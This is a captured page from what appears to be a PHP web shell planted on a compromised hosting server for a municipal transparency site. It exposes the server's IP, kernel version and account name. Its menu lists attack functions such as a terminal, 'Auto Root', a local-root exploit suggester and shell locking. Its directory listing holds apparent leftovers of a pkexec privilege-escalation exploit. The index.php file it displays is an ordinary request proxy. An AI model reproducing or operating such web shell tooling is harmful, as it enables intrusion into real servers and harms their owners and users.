Linux 186-227-203-186.cprapid.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
Apache
Server IP : 186.227.203.186 & Your IP : 216.73.217.146
Domains : 154 Domain
User : pmcaxingo
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
pmcaxingo /
public_html /
transparencia /
Delete
Unzip
Name
Size
Permission
Date
Action
.pkexec
[ DIR ]
drwxr-xr-x
2026-04-07 19:46
.well-known
[ DIR ]
drwxr-xr-x
2024-11-07 04:42
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
2026-04-08 03:39
cgi-bin
[ DIR ]
drwxr-xr-x
2023-08-24 16:32
lib
[ DIR ]
drwxr-xr-x
2025-03-03 17:52
.htaccess
441
B
-rw-r--r--
2026-04-30 03:06
index.php
657
B
-rw-r--r--
2024-10-04 14:08
Save
Rename
<? if($_SERVER['SERVER_PROTOCOL'] == "HTTP/2.0"){ $redirect_http = "http://" . $_SERVER["SERVER_NAME"]; header('Location: ' . $redirect_http); } $url = "https://transparencia.tweb.inf.br{$_SERVER["REQUEST_URI"]}"; $postData = [ 'cliente' => 'pmcaxingo' ]; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); // Define o método como POST curl_setopt($curl, CURLOPT_POST, true); // Anexa os dados ao corpo da requisição POST curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($postData)); $resp = curl_exec($curl); curl_close($curl); print_r($resp);